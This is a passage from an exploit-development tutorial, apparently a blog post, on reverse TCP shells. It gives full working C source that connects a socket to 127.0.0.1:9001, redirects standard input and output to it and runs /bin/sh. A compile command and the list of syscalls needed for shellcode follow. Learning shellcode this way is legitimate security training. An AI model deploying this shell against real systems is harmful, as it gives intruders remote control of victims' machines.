[ExpDev] Reverse TCP Shell

What is a Reverse Shell?

Oppose to a Bind Shell, a Reverse Shell connects back to the attacker’s computer upon a payload executed on the victim’s system. This type of shell is more useful when the target organization has a strong Firewalls for inbound connection. The Reverse Shell can take the advantage of common outbound ports such as port 80, 443, 53 and etc.

Socket Programming

Similar to the Bind TCP Shell exercise, let’s create a Reverse TCP Shell in a higher programming language. We will use `C` again:

#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
int main()
{
    int sockfd;
    int port = 9001;
    // Address struct
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(“127.0.0.1”);
    // 1) Socket Syscall (sys_socket 1)
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    // 2) Connect Syscall
    connect(sockfd, (struct sockaddr *) &addr, sizeof(addr));
    // 3) Dup2 Syscall
    dup2(sockfd, 0); //stdin
    dup2(sockfd, 1); //stdout
    dup2(sockfd, 2); //stderr
    // 4) Execve Syscall
    execve(“/bin/sh”, NULL, NULL);
    return 0;
}

Let’s compile this:

gcc reverse-tcp-shell.c -o reverse-tcp-shell -w

The compiled reverse shell binary can successfully connect back to 127.0.0.1:9001 as expected.

Shellcode

For the Reverse TCP Shell, we need to following syscalls:

1. Socket: Initializing the Socket connection
2. Connect: Creating the Connect call to the given address
3. Dup2: Manages stdin, stdout and stderr for the file descriptor. This is necessary for input and output redirection.
4. Execve: Execute a command (/bin/sh to spawn a shell)

Syscall + Function Calls

First, we need to collect arguments for socketcall() as well as other syscalls.

NOTE: socketcall() is a…